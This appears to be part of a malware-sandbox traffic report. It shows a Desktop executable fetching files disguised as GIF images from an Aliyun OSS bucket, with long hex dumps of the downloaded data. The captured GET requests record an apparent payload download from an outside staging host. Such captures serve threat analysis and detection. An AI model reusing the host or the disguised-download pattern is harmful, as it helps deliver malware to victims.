                                2025-01-08 09:11:26 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                2025-01-08 09:11:26 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                2025-01-08 09:11:26 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                2025-01-08 09:11:26 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                2025-01-08 09:11:26 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                2025-01-08 09:11:26 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                2025-01-08 09:11:26 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.64997459.110.190.444436208C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                TimestampBytes transferredDirectionData
                                2025-01-08 09:11:27 UTC111OUTGET /c.gif HTTP/1.1
                                User-Agent: GetData
                                Host: basdy1.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-08 09:11:27 UTC545INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Wed, 08 Jan 2025 09:11:27 GMT
                                Content-Type: image/gif
                                Content-Length: 10681
                                Connection: close
                                x-oss-request-id: 677E413F820F3F333422F651
                                Accept-Ranges: bytes
                                ETag: "10A818386411EE834D99AE6B7B68BE71"
                                Last-Modified: Wed, 08 Jan 2025 03:41:24 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 10287299869673359293
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                x-oss-server-time: 8
                                2025-01-08 09:11:27 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-08 09:11:27 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                                Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                                2025-01-08 09:11:27 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                                Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.64997559.110.190.444436208C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                TimestampBytes transferredDirectionData
                                2025-01-08 09:11:29 UTC111OUTGET /d.gif HTTP/1.1
                                User-Agent: GetData
                                Host: basdy1.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-08 09:11:29 UTC547INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Wed, 08 Jan 2025 09:11:29 GMT
                                Content-Type: image/gif
                                Content-Length: 3892010
                                Connection: close
                                x-oss-request-id: 677E4141F326DB3530D68726
                                Accept-Ranges: bytes
                                ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                Last-Modified: Wed, 08 Jan 2025 03:41:35 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 3363616613234190325
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                x-oss-server-time: 52
                                2025-01-08 09:11:29 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-08 09:11:29 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                2025-01-08 09:11:29 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                2025-01-08 09:11:29 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                Data Ascii: -J;wuwu{}uG`uWu{Q6
                                2025-01-08 09:11:29 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                2025-01-08 09:11:29 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                2025-01-08 09:11:29 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                2025-01-08 09:11:29 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
